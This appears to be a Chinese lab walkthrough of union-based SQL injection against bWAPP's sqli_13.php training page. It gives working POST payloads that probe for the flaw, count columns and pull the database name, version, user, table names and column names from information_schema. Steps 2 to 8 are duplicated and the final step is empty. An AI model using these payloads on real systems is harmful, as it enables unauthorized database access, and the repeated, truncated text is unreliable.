SQL註入之bWAPP之sqli_13.php
阿新 • • 發佈:2018-03-28
bWAPP之sqli_13.php1、還是老樣子查看POST參數然後構造,結果如圖:
2、在hackbar的POST框中輸入“movie=1‘”,報錯中包含三個單引號,說明應該是數字型註入,結果如圖:
3、輸入“movie=1 and 1=1”正常,輸入“movie=1 and 1=2”報錯,結果如下圖:
所以該處存在數字型註入點
4、判斷字段數:
輸入“movie=1 order by 7”正常,輸入“movie=1 order by 8”報錯,說明字段數為7,結果如圖:
查看顯示位置,輸入“movie=-1 union select 1,2,3,4,5,6,7”,結果如圖:
5、查詢數據庫等信息:
輸入“movie=-1 union select 1,database(),version(),4,user(),6,7”,查看數據庫名、數據庫版本、當前用戶,結果如圖:
6、查詢表名:
輸入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘”,表名為blog,結果如圖:
7、查詢字段名:
輸入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘blog‘”,字段名為id,結果如圖:
8、查詢字段內容:
2、在hackbar的POST框中輸入“movie=1‘”,報錯中包含三個單引號,說明應該是數字型註入,結果如圖:
3、輸入“movie=1 and 1=1”正常,輸入“movie=1 and 1=2”報錯,結果如下圖:
所以該處存在數字型註入點
4、判斷字段數:
輸入“movie=1 order by 7”正常,輸入“movie=1 order by 8”報錯,說明字段數為7,結果如圖:
查看顯示位置,輸入“movie=-1 union select 1,2,3,4,5,6,7”,結果如圖:
5、查詢數據庫等信息:
輸入“movie=-1 union select 1,database(),version(),4,user(),6,7”,查看數據庫名、數據庫版本、當前用戶,結果如圖:
6、查詢表名:
輸入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘”,表名為blog,結果如圖:
7、查詢字段名:
輸入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘blog‘”,字段名為id,結果如圖:
8、查詢字段內容:
SQL註入之bWAPP之sqli_13.php